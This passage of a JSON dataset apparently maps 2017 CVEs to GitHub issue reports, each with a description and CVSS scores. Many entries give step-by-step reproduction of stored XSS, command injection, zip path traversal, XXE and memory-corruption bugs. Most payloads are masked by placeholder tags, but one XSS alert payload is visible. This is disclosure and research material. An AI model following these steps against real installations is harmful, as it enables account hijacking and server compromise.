  5086. "CVE_ID": "CVE-2017-1000465",
  5087. "Issue_Url_old": "https://github.com/sulu/sulu-standard/issues/835",
  5088. "Issue_Url_new": "https://github.com/sulu/sulu-standard/issues/835",
  5089. "Repo_new": "sulu/sulu-standard",
  5090. "Issue_Created_At": "2017-10-29T02:54:23Z",
  5091. "description": "Stored Cross site Scripting (XSS) in page creation. | Q | A | | | Bug? | Yes | New Feature? | no | Sulu Version NUMBERTAG Browser Version | Chrome Actual Behavior Sulu saves the code unsanitised and allows arbitrary execution of javascript. Expected Behavior Sulu should remove the javascript payload as it does for most others. Steps to Reproduce NUMBERTAG Log in as a user with page editing permissions NUMBERTAG Choose to edit an article NUMBERTAG Add a new block with type text NUMBERTAG Click the source code button on the editor and enter the following code: APITAG NUMBERTAG Save the code Possible Solutions Check iframe src prior to adding to the page.",
  5092. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  5093. "severity": "MEDIUM",
  5094. "baseScore": 5.4,
  5095. "impactScore": 2.7,
  5096. "exploitabilityScore": 2.3
  5097. },
  5098. {
  5099. "CVE_ID": "CVE-2017-1000466",
  5100. "Issue_Url_old": "https://github.com/invoiceninja/invoiceninja/issues/1727",
  5101. "Issue_Url_new": "https://github.com/invoiceninja/invoiceninja/issues/1727",
  5102. "Repo_new": "invoiceninja/invoiceninja",
  5103. "Issue_Created_At": "2017-10-30T00:07:46Z",
  5104. "description": "Stored Cross site Scripting in Client's Name. Issue Anyone with the permission to change a client's name can use that parameter to gain arbitrary execution of javascript. Anyone who can create an invoice will be affected by this payload. Steps to reproduce NUMBERTAG Create a client NUMBERTAG Change the client's name, first name, and last name to the following payload: APITAG NUMBERTAG Go to create an invoice NUMBERTAG Select that client. Observe an alert box has popped up.",
  5105. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  5106. "severity": "MEDIUM",
  5107. "baseScore": 5.4,
  5108. "impactScore": 2.7,
  5109. "exploitabilityScore": 2.3
  5110. },
  5111. {
  5112. "CVE_ID": "CVE-2017-1000467",
  5113. "Issue_Url_old": "https://github.com/LavaLite/cms/issues/209",
  5114. "Issue_Url_new": "https://github.com/lavalite/cms/issues/209",
  5115. "Repo_new": "lavalite/cms",
  5116. "Issue_Created_At": "2017-10-30T03:32:47Z",
  5117. "description": "Stored Cross site Scripting (XSS). Issue Stored XSS found within the blog creation page. This allows attackers to get arbitrary execution of javascript code. Steps to reproduce NUMBERTAG Log into a user's account with blog writing permissions (like role user in the demo website NUMBERTAG Go to the blogs page NUMBERTAG Create a blog page, with the contents of the page as follows: ERRORTAG Please ensure this payload is entered using the source code view of the blog editor",
  5118. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  5119. "severity": "MEDIUM",
  5120. "baseScore": 5.4,
  5121. "impactScore": 2.7,
  5122. "exploitabilityScore": 2.3
  5123. },
  5124. {
  5125. "CVE_ID": "CVE-2017-1000469",
  5126. "Issue_Url_old": "https://github.com/cobbler/cobbler/issues/1845",
  5127. "Issue_Url_new": "https://github.com/cobbler/cobbler/issues/1845",
  5128. "Repo_new": "cobbler/cobbler",
  5129. "Issue_Created_At": "2017-10-19T08:15:37Z",
  5130. "description": "The Repos feature is vulnerable to commands injection attack. In the Repos feature, Cobbler does not sanitize its user input; as a result, it is possible to execute arbitrary commands by specifying a malformed repository mirror during its creation or edition. As the service runs as root, it is thus possible to leak sensitive information and gain remote root access on the machine that runs Cobbler. Sample of a malicious input, entered in the Mirror field in the Adding a Repo form: APITAG Then a Reposync action has to be executed to trigger the malicious command to run. Its output can be seen in the log of the action, which is in the Events page. To fix this issue, we would suggest to filter the user input to remove none valid path characters. Additionally, it would be advisable to run rsync command, if not the entire service, as an unprivileged user. This issue has been verified on versions up to NUMBERTAG",
  5131. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  5132. "severity": "CRITICAL",
  5133. "baseScore": 9.8,
  5134. "impactScore": 5.9,
  5135. "exploitabilityScore": 3.9
  5136. },
  5137. {
  5138. "CVE_ID": "CVE-2017-1000472",
  5139. "Issue_Url_old": "https://github.com/pocoproject/poco/issues/1968",
  5140. "Issue_Url_new": "https://github.com/pocoproject/poco/issues/1968",
  5141. "Repo_new": "pocoproject/poco",
  5142. "Issue_Created_At": "2017-11-01T17:43:53Z",
  5143. "description": "Zip Decompress Parent Path Injection. By manipulation of the Zip input file header, the contents of the zip archive can be written to an arbitrary parent path of the user. Expected behavior Throw an exception if filename contains a parent directory reference. APITAG APITAG should check if the filename contains a tilde character. Actual behavior By inserting a tilde slash (~/) in the filename area of the zip header, files can be written to the user's home directory. Steps to reproduce the problem Use the sample unzip samle application as follows: ERRORTAG _ FILETAG _ contains a file _foo_. _foo_ includes the string _bar_ vuln.zip hexdump: CODETAG After executing the program, a file _o_ with the content _bar_ is written in the home of the user. APITAG (_o_ is just an example name) POCO version APITAG Compiler and version clang version NUMBERTAG PATHTAG ) Operating system and version NUMBERTAG APITAG NUMBERTAG SMP Mon Oct NUMBERTAG UTC NUMBERTAG APITAG Security implications Due to the current behavior of the Zip Decompress mechanism it is possible to write files in parent arbitrary user directories. For example, a manipulated _.bashrc_ could be inserted into the user's home. Cheers Stephan Zeisberg",
  5144. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  5145. "severity": "MEDIUM",
  5146. "baseScore": 6.5,
  5147. "impactScore": 3.6,
  5148. "exploitabilityScore": 2.8
  5149. },
  5150. {
  5151. "CVE_ID": "CVE-2017-1000473",
  5152. "Issue_Url_old": "https://github.com/afaqurk/linux-dash/issues/447",
  5153. "Issue_Url_new": "https://github.com/tariqbuilds/linux-dash/issues/447",
  5154. "Repo_new": "tariqbuilds/linux-dash",
  5155. "Issue_Created_At": "2017-11-09T07:21:04Z",
  5156. "description": "Command injection vulnerabilities. There are multiple command injection vulnerabilities in the current version linux dash NUMBERTAG The python and node versions of the servers are vulnerable to code injection. For example, with the python server running on my local host, navigating to the URL URLTAG will output the listing of the current directory. FILETAG In the case of the node version, by using a node client commands can be executed directly. For example: FILETAG At this point, it is pretty trivial to gain a shell on the server. And since the readme mentions that it may require sudo, there's a good chance that shell will be a root shell NUMBERTAG In FILETAG , the final two lines of the script are as follows: APITAG Since all the various versions of the servers (go, node, php, and python) all simply pass an argument to this shell script, some limited command injection is possible. For example, any linux commands that do not need an argument. For example, when running the python version of the server on my localhost the URL URLTAG will return: FILETAG Depending on the permissions of the user running the server, it may be possible to do things like APITAG the system by shutting it down.",
  5157. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  5158. "severity": "HIGH",
  5159. "baseScore": 7.8,
  5160. "impactScore": 5.9,
  5161. "exploitabilityScore": 1.8
  5162. },
  5163. {
  5164. "CVE_ID": "CVE-2017-1000476",
  5165. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/867",
  5166. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/867",
  5167. "Repo_new": "imagemagick/imagemagick",
  5168. "Issue_Created_At": "2017-11-17T03:36:06Z",
  5169. "description": "CPU exhaustion in APITAG Hello all. We found a denial of service APITAG issue in APITAG NUMBERTAG Q NUMBERTAG which can cause huge CPU consumption. (cpu NUMBERTAG The FILETAG is as following CODETAG convert APITAG cpu exhaustion /dev/null gdb backtrace ERRORTAG when debug found dds_info >mipmapcount is very large CODETAG testcase: URLTAG",
  5170. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  5171. "severity": "MEDIUM",
  5172. "baseScore": 6.5,
  5173. "impactScore": 3.6,
  5174. "exploitabilityScore": 2.8
  5175. },
  5176. {
  5177. "CVE_ID": "CVE-2017-1000477",
  5178. "Issue_Url_old": "https://github.com/pravednik/xmlBundle/issues/2",
  5179. "Issue_Url_new": "https://github.com/pravednik/xmlbundle/issues/2",
  5180. "Repo_new": "pravednik/xmlbundle",
  5181. "Issue_Created_At": "2017-11-20T11:16:58Z",
  5182. "description": "XXE APITAG Security Vulnerability. APITAG APITAG is vulnerable to an XXE APITAG vulnerability. The code with the APITAG is given below: ERRORTAG This can be used to create very large strings, which can eventually APITAG the system. Due to the working of APITAG , we cannot run system commands using the package (tested with my limited knowledge though). However, entities can be used easily. Hope this helps!",
  5183. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  5184. "severity": "HIGH",
  5185. "baseScore": 7.5,
  5186. "impactScore": 3.6,
  5187. "exploitabilityScore": 3.9
  5188. },
  5189. {
  5190. "CVE_ID": "CVE-2017-1000478",
  5191. "Issue_Url_old": "https://github.com/elabftw/elabftw/issues/531",
  5192. "Issue_Url_new": "https://github.com/elabftw/elabftw/issues/531",
  5193. "Repo_new": "elabftw/elabftw",
  5194. "Issue_Created_At": "2017-11-20T11:48:14Z",
  5195. "description": "Stored Cross site Scripting Bypassing APITAG Editor. Description of the problem Anyone who can edit an experiment can gain arbitrary execution of APITAG stored within an experiment. All you have to do is use a web interception proxy, like Burp Suite, and intercept the saving of an experiment. Edit the infos section of the experiment and add in ERRORTAG . An alert box will show up, which proves the arbitrary execution of APITAG code. Information Elabftw version (visible in Sysadmin panel NUMBERTAG Installation method (git, docker or zip archive) : git Operating system + version : Ubuntu NUMBERTAG Browser used (firefox/chrome) : firefox For git/zip installation method: PHP version NUMBERTAG APITAG version NUMBERTAG Webserver (apache/nginx) + version : Apache NUMBERTAG",
  5196. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  5197. "severity": "MEDIUM",
  5198. "baseScore": 5.4,
  5199. "impactScore": 2.7,
  5200. "exploitabilityScore": 2.3
  5201. },
  5202. {
  5203. "CVE_ID": "CVE-2017-1000485",
  5204. "Issue_Url_old": "https://github.com/nylas-mail-lives/nylas-mail/issues/181",
  5205. "Issue_Url_new": "https://github.com/nylas-mail-lives/nylas-mail/issues/181",
  5206. "Repo_new": "nylas-mail-lives/nylas-mail",
  5207. "Issue_Created_At": "2017-11-29T05:14:40Z",
  5208. "description": "Set more restrictive permssion on .nylas mail. On APITAG by default the APITAG directory has NUMBERTAG permission, so other users can use APITAG and APITAG to retrieve my credentials. A CVE was assigned for a similar vulnerability URLTAG in Telegram Desktop, should I request a CVE for this issue?",
  5209. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  5210. "severity": "HIGH",
  5211. "baseScore": 7.8,
  5212. "impactScore": 5.9,
  5213. "exploitabilityScore": 1.8
  5214. },
  5215. {
  5216. "CVE_ID": "CVE-2017-1000486",
  5217. "Issue_Url_old": "https://github.com/primefaces/primefaces/issues/1152",
  5218. "Issue_Url_new": "https://github.com/primefaces/primefaces/issues/1152",
  5219. "Repo_new": "primefaces/primefaces",
  5220. "Issue_Created_At": "2016-02-15T18:16:21Z",
  5221. "description": "EL Injection in Primefaces NUMBERTAG As already shared privately last year PATHTAG is to vulnerable to remote exploitable code execution through EL Injection You can find more information here: FILETAG",
  5222. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  5223. "severity": "CRITICAL",
  5224. "baseScore": 9.8,
  5225. "impactScore": 5.9,
  5226. "exploitabilityScore": 3.9
  5227. },
  5228. {
  5229. "CVE_ID": "CVE-2017-1000491",
  5230. "Issue_Url_old": "https://github.com/rhysd/Shiba/issues/42",
  5231. "Issue_Url_new": "https://github.com/rhysd/shiba/issues/42",
  5232. "Repo_new": "rhysd/shiba",
  5233. "Issue_Created_At": "2017-11-25T19:07:19Z",
  5234. "description": "XSS to RCE vulnerability report. Hello, I would like to report a XSS vulnerability in your application that leads to code execution. I have a working POC that I dont want to post publicly. Please contact me at EMAILTAG",
  5235. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  5236. "severity": "MEDIUM",
  5237. "baseScore": 6.1,
  5238. "impactScore": 2.7,
  5239. "exploitabilityScore": 2.8
  5240. },
  5241. {
  5242. "CVE_ID": "CVE-2017-1000492",
  5243. "Issue_Url_old": "https://github.com/leanote/leanote/issues/695",
  5244. "Issue_Url_new": "https://github.com/leanote/leanote/issues/695",
  5245. "Repo_new": "leanote/leanote",
  5246. "Issue_Created_At": "2017-11-28T10:06:48Z",
  5247. "description": "XSS to code execution. This issue should not be closed before being fixed. Also I have made a request on full disclosure on the issue. URLTAG",
  5248. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  5249. "severity": "MEDIUM",
  5250. "baseScore": 6.1,
  5251. "impactScore": 2.7,
  5252. "exploitabilityScore": 2.8
  5253. },
  5254. {
  5255. "CVE_ID": "CVE-2017-1000494",
  5256. "Issue_Url_old": "https://github.com/miniupnp/miniupnp/issues/268",
  5257. "Issue_Url_new": "https://github.com/miniupnp/miniupnp/issues/268",
  5258. "Repo_new": "miniupnp/miniupnp",
  5259. "Issue_Created_At": "2017-12-09T16:08:00Z",
  5260. "description": "Heap buffer overflow in parseelt (minixml.c) and SIGSEGV in APITAG (upnpreplyparse.c). Dear miniupnpd team \u2014 I have detected a heap buffer overflow in parseelt (minixml.c) and a memory corruption (invalid read, SIGSEGV) in APITAG (upnpreplyparse.c). while handling two consecutive malformed SOAP Request. Version APITAG How to reproduce the NUMBERTAG issues NUMBERTAG Compile miniupnpd with clang and add the following flags for detecting the memory corruption (optional valgrind can also detect the overflow) APITAG NUMBERTAG Start miniupnpd APITAG NUMBERTAG Use _netcat_ to trigger the heap buffer overflow CODETAG NUMBERTAG Use _netcat_ to trigger the consecutive SIGSEGV CODETAG ASAN output (heap buffer overflow) ERRORTAG ASAN output (SIGSEGV) ERRORTAG Valgrind output (heap buffer overflow + SIGSEGV if compiled without the flags from NUMBERTAG ERRORTAG I found the two issues with AFL. Best Stephan Zeisberg",
  5261. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  5262. "severity": "HIGH",
  5263. "baseScore": 7.8,
  5264. "impactScore": 5.9,
  5265. "exploitabilityScore": 1.8
  5266. },
  5267. {
  5268. "CVE_ID": "CVE-2017-1000495",
  5269. "Issue_Url_old": "https://github.com/quickapps/cms/issues/183",
  5270. "Issue_Url_new": "https://github.com/quickapps/cms/issues/183",
  5271. "Repo_new": "quickapps/cms",
  5272. "Issue_Created_At": "2017-12-11T10:28:01Z",
  5273. "description": "Stored Cross Site Scripting (XSS). Issue Any user can execute APITAG code on an administrator user's account by simply changing their name into an XSS payload. This can be used to create a denial of service condition, or make the administrator perform unauthorised actions. Steps to reproduce NUMBERTAG Create a user with the lowest privileges NUMBERTAG Navigate to the 'My Account' section of the application NUMBERTAG Change the user's real name to a APITAG payload, like ERRORTAG NUMBERTAG Log out of the account NUMBERTAG Log into an administrator account NUMBERTAG Navigate to the user list in the administrator's console NUMBERTAG Observe an alert box appear",
  5274. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  5275. "severity": "MEDIUM",
  5276. "baseScore": 5.4,
  5277. "impactScore": 2.7,
  5278. "exploitabilityScore": 2.3
  5279. },
  5280. {
  5281. "CVE_ID": "CVE-2017-1000496",
  5282. "Issue_Url_old": "https://github.com/commsy/commsy/issues/2",
  5283. "Issue_Url_new": "https://github.com/commsy/commsy/issues/2",
  5284. "Repo_new": "commsy/commsy",
  5285. "Issue_Created_At": "2017-12-13T03:41:04Z",
  5286. "description": "XXE APITAG in configuration import. Issue An appropriately placed attacker can upload a ZIP file with XML files within it. If these XML files contain the payload from billion laughs attack ( URLTAG a denial of service scenario can be created. Remediation Before loading the XML into memory, use APITAG to ensure no entities can affect your import",
  5287. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  5288. "severity": "HIGH",
  5289. "baseScore": 8.8,
  5290. "impactScore": 5.9,
  5291. "exploitabilityScore": 2.8
  5292. },
  5293. {
  5294. "CVE_ID": "CVE-2017-1000497",
  5295. "Issue_Url_old": "https://github.com/sbrl/Pepperminty-Wiki/issues/152",
  5296. "Issue_Url_new": "https://github.com/sbrl/pepperminty-wiki/issues/152",
  5297. "Repo_new": "sbrl/pepperminty-wiki",
  5298. "Issue_Created_At": "2017-12-13T03:56:34Z",
  5299. "description": "XXE APITAG in getsvgsize. Issue Pepperminty Wiki is vulnerable to XXE attacks due to the usage of the APITAG function without disabling entities. This leads to a confirmed denial of service scenario ( URLTAG and may lead to execution of commands on the server. Where the Issue Occurred If an uploaded svg, containing the billion laughs payload, makes its way to the simplexml_load_file function, the denial of service scenario is triggered. This exact locations in the code are given below: URLTAG URLTAG Remediation Prior to loading any xml, disable entities ensuring that the above mentioned attacks will no longer be possible. APITAG",
  5300. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  5301. "severity": "CRITICAL",
  5302. "baseScore": 9.8,
  5303. "impactScore": 5.9,
  5304. "exploitabilityScore": 3.9
  5305. },
  5306. {
  5307. "CVE_ID": "CVE-2017-1000498",
  5308. "Issue_Url_old": "https://github.com/BigBadaboom/androidsvg/issues/122",
  5309. "Issue_Url_new": "https://github.com/bigbadaboom/androidsvg/issues/122",
  5310. "Repo_new": "bigbadaboom/androidsvg",
  5311. "Issue_Created_At": "2017-12-13T05:33:19Z",
  5312. "description": "XXE APITAG within SVG Parsing. Issue androidsvg is vulnerable to XXE attacks as some dangerous features are not disabled. This leads to a confirmed denial of service scenario ( URLTAG and may lead to execution of commands on the server. This issue occurs in the SVG parse section of the code: URLTAG Prior to parsing the XML, features like entities are not disabled. These should not be required at all within an SVG file. Remediation Implementing something down the lines of the following: CODETAG This ensures that the entities are no longer parsed and external dtd files are not either.",
  5313. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  5314. "severity": "HIGH",
  5315. "baseScore": 7.8,
  5316. "impactScore": 5.9,
  5317. "exploitabilityScore": 1.8
  5318. },
  5319. {
  5320. "CVE_ID": "CVE-2017-1000506",
  5321. "Issue_Url_old": "https://github.com/mautic/mautic/issues/5222",
  5322. "Issue_Url_new": "https://github.com/mautic/mautic/issues/5222",
  5323. "Repo_new": "mautic/mautic",
  5324. "Issue_Created_At": "2017-10-27T00:49:18Z",
  5325. "description": "Stored XSS in Company Name. What type of report is this: | Q | A | | | Bug report? | \u2713 | Feature request? | | Enhancement? | Description: Stored Cross site scripting in the Company's name. This allows a person to gain arbitrary execution of JS code on anyone who views the Company's name within their browser. If a bug: | Q | A | | | Mautic version NUMBERTAG PHP version NUMBERTAG Steps to reproduce NUMBERTAG Create a new company NUMBERTAG Set the company name to ERRORTAG NUMBERTAG Navigate to a place where the company name is reflected and observe an alert box pop up Log errors: APITAG check for related errors in the latest log file in [mautic PATHTAG and/or the web server's logs and post them here. Be sure to remove sensitive information if applicable._ None",
  5326. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  5327. "severity": "MEDIUM",
  5328. "baseScore": 6.1,
  5329. "impactScore": 2.7,
  5330. "exploitabilityScore": 2.8
  5331. },
  5332. {
  5333. "CVE_ID": "CVE-2017-1000507",
  5334. "Issue_Url_old": "https://github.com/cnvs/canvas/issues/359",
  5335. "Issue_Url_new": "https://github.com/austintoddj/canvas/issues/359",
  5336. "Repo_new": "austintoddj/canvas",
  5337. "Issue_Created_At": "2017-10-27T02:52:28Z",
  5338. "description": "Stored XSS Vulnerability. Description An attacker can arbitrarily execute JS code in another user's browser. Steps to reproduce NUMBERTAG Log in with a valid user NUMBERTAG Change the user's display name to ERRORTAG NUMBERTAG Log out of the account NUMBERTAG Log into an admin user NUMBERTAG Navigate to the user page (listing all users). Notice an alert box pops up showing execution of JS Remediation When printing this variable out, simply HTML encode it.",
  5339. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  5340. "severity": "MEDIUM",
  5341. "baseScore": 5.4,
  5342. "impactScore": 2.7,
  5343. "exploitabilityScore": 2.3
  5344. },
  5345. {
  5346. "CVE_ID": "CVE-2017-1000509",
  5347. "Issue_Url_old": "https://github.com/Dolibarr/dolibarr/issues/7727",
  5348. "Issue_Url_new": "https://github.com/dolibarr/dolibarr/issues/7727",
  5349. "Repo_new": "dolibarr/dolibarr",
  5350. "Issue_Created_At": "2017-10-27T22:01:56Z",
  5351. "description": "Stored Cross site scripting (XSS) in product page. Bug Stored Cross site scripting (XSS) using product page, bypassing XSS detection Environment Version NUMBERTAG OS : Ubuntu Web server : Apache PHP NUMBERTAG Database : APITAG URL(s) : APITAG Expected and actual behavior Expected behaviour XSS detector picks up on the payload and refuses to save it Actual behaviour XSS payload is saved with no interference from the detector. When visiting the page later, the payload executes. Steps to reproduce the behavior NUMBERTAG Log into Dolibarr with a user who can edit the name of a product NUMBERTAG Choose a product (this products name will be changed FYI), and click on the modify details button NUMBERTAG Append the following payload to the product's current name: APITAG Suggested implementation Change the detector to now pick up on similar payloads (including this one)",
  5352. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  5353. "severity": "MEDIUM",
  5354. "baseScore": 5.4,
  5355. "impactScore": 2.7,
  5356. "exploitabilityScore": 2.3
  5357. },
  5358. {
  5359. "CVE_ID": "CVE-2017-1000510",
  5360. "Issue_Url_old": "https://github.com/croogo/croogo/issues/847",
  5361. "Issue_Url_new": "https://github.com/croogo/croogo/issues/847",
  5362. "Repo_new": "croogo/croogo",
  5363. "Issue_Created_At": "2017-10-28T08:15:05Z",
  5364. "description": "Stored Cross site Scripting (XSS). Summary Stored Cross site Scripting (XSS) in page name allowing a user to get arbitrary JS execution. This isn't really a big issue as the website already has all session tokens using APITAG and you need to be an administrator (if using as the default) to post. It is quite reasonable for organisations to make other roles for contributors/authors, hence being worth the patch. I'm not too sure if this is still an issue in NUMBERTAG as I couldn't get the server set up for it yet. System information Croogo version NUMBERTAG g6f NUMBERTAG e6c Web server: apache2 APITAG Ubuntu NUMBERTAG Steps to reproduce NUMBERTAG Log into the website NUMBERTAG Create a new page NUMBERTAG Set the page's name to ERRORTAG NUMBERTAG isit the page list section of the admin panel and observe an alert box pop up. Expected behavior ERRORTAG is HTML Encoded Actual behavior JS code is arbitrarily executed",
  5365. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  5366. "severity": "MEDIUM",
  5367. "baseScore": 5.4,
  5368. "impactScore": 2.7,
  5369. "exploitabilityScore": 2.3
  5370. },
  5371. {
  5372. "CVE_ID": "CVE-2017-1001001",
  5373. "Issue_Url_old": "https://github.com/pluxml/PluXml/issues/253",
  5374. "Issue_Url_new": "https://github.com/pluxml/pluxml/issues/253",
  5375. "Repo_new": "pluxml/pluxml",
  5376. "Issue_Created_At": "2017-09-22T05:54:56Z",
  5377. "description": "Stored XSS within article creation. A writer or the administrator can write javascript within the page, which can then be used to steal other user's session tokens (actually quite possible as the session token doesn't have APITAG enabled). Adding something like APITAG , in the article's content stores the payload on the server. Then any user who visits the page is affected by the payload. I would advise HTML encoding the user input and also setting the APITAG flag on the session token.",
  5378. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  5379. "severity": "MEDIUM",
  5380. "baseScore": 5.4,
  5381. "impactScore": 2.7,
  5382. "exploitabilityScore": 2.3
  5383. },
  5384. {
  5385. "CVE_ID": "CVE-2017-1002100",
  5386. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/47611",
  5387. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/47611",
  5388. "Repo_new": "kubernetes/kubernetes",
  5389. "Issue_Created_At": "2017-06-15T18:59:13Z",
  5390. "description": "Azure PV should be Private scope not Container scope.",
  5391. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  5392. "severity": "MEDIUM",
  5393. "baseScore": 6.5,
  5394. "impactScore": 3.6,
  5395. "exploitabilityScore": 2.8
  5396. },
  5397. {
  5398. "CVE_ID": "CVE-2017-1002101",
  5399. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/60813",
  5400. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/60813",
  5401. "Repo_new": "kubernetes/kubernetes",
  5402. "Issue_Created_At": "2018-03-05T20:53:58Z",
  5403. "description": "APITAG . <content tbd>",
  5404. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N",
  5405. "severity": "CRITICAL",
  5406. "baseScore": 9.6,
  5407. "impactScore": 5.8,
  5408. "exploitabilityScore": 3.1
  5409. },
  5410. {
  5411. "CVE_ID": "CVE-2017-1002102",
  5412. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/60814",
  5413. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/60814",
  5414. "Repo_new": "kubernetes/kubernetes",
  5415. "Issue_Created_At": "2018-03-05T20:55:20Z",
  5416. "description": "APITAG . <content tbd>",
  5417. "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:N/I:H/A:N",
  5418. "severity": "MEDIUM",
  5419. "baseScore": 5.6,
  5420. "impactScore": 4.0,
  5421. "exploitabilityScore": 1.1
  5422. },
  5423. {
  5424. "CVE_ID": "CVE-2017-1002152",
  5425. "Issue_Url_old": "https://github.com/fedora-infra/bodhi/issues/1740",
  5426. "Issue_Url_new": "https://github.com/fedora-infra/bodhi/issues/1740",
  5427. "Repo_new": "fedora-infra/bodhi",
  5428. "Issue_Created_At": "2017-08-10T15:53:09Z",
  5429. "description": "CVETAG : APITAG injection via Bugzilla ticket subjects. Marcel reported CVETAG that it is possible to inject APITAG into Bodhi's web interface through Bugzilla ticket subjects. The reporter cited an update URLTAG that did not properly escape tags from the bug it was associated with. We should run the bugzilla text through bleach, similar to what we do for comments from our users.",
  5430. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  5431. "severity": "MEDIUM",
  5432. "baseScore": 6.1,
  5433. "impactScore": 2.7,
  5434. "exploitabilityScore": 2.8
  5435. },
  5436. {
  5437. "CVE_ID": "CVE-2017-10667",
  5438. "Issue_Url_old": "https://github.com/zhonghaozhao/zencart/issues/1",
  5439. "Issue_Url_new": "https://github.com/zhonghaozhao/zencart/issues/1",
  5440. "Repo_new": "zhonghaozhao/zencart",
  5441. "Issue_Created_At": "2017-06-24T04:30:35Z",
  5442. "description": "zencart. XSS URLTAG FILETAG URLTAG FILETAG",
  5443. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  5444. "severity": "MEDIUM",
  5445. "baseScore": 6.1,
  5446. "impactScore": 2.7,
  5447. "exploitabilityScore": 2.8
  5448. },
  5449. {
  5450. "CVE_ID": "CVE-2017-10667",
  5451. "Issue_Url_old": "https://github.com/zencart/zencart/issues/1443",
  5452. "Issue_Url_new": "https://github.com/zencart/zencart/issues/1443",
  5453. "Repo_new": "zencart/zencart",
  5454. "Issue_Created_At": "2017-06-24T03:36:00Z",
  5455. "description": "XSS. URLTAG FILETAG URLTAG FILETAG affect NUMBERTAG",
  5456. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  5457. "severity": "MEDIUM",
  5458. "baseScore": 6.1,
  5459. "impactScore": 2.7,
  5460. "exploitabilityScore": 2.8
  5461. },
  5462. {
  5463. "CVE_ID": "CVE-2017-10673",
  5464. "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1234",
  5465. "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1234",
  5466. "Repo_new": "getsimplecms/getsimplecms",
  5467. "Issue_Created_At": "2017-06-28T02:37:37Z",
  5468. "description": "admin/profile.php At xss. Display Name: where there is xss payload: \"> APITAG alert(/xss/) APITAG",
  5469. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  5470. "severity": "MEDIUM",
  5471. "baseScore": 6.1,
  5472. "impactScore": 2.7,
  5473. "exploitabilityScore": 2.8
  5474. },
  5475. {
  5476. "CVE_ID": "CVE-2017-10678",
  5477. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/721",
  5478. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/721",
  5479. "Repo_new": "piwigo/piwigo",
  5480. "Issue_Created_At": "2017-06-28T20:07:56Z",
  5481. "description": "Bug Report: Set administrator private album to public via CSRF & Incorrect Permissions. Proof of Concept APITAG Incorrect Permissions in album ID The public / private tags private means that administrator don\u2019t want others know about album. But there is some way to know what album his hiding. And what the private album\u2019s permalinks is NUMBERTAG By creating album , you could know that album id is in rule NUMBERTAG So you can brute force the album id CODETAG FILETAG FILETAG FILETAG Now is time to republic it. Cross Site Request Forgery in page permalinks & status, visible, comments in page cat_options. There is no pwg_token in the request. So NUMBERTAG set private albums to public CODETAG NUMBERTAG Permalink delete CODETAG NUMBERTAG unlock albums CODETAG Original packet CODETAG Refences: URLTAG Discover By: topsec(Li Zhiqiang)",
  5482. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  5483. "severity": "HIGH",
  5484. "baseScore": 8.8,
  5485. "impactScore": 5.9,
  5486. "exploitabilityScore": 2.8
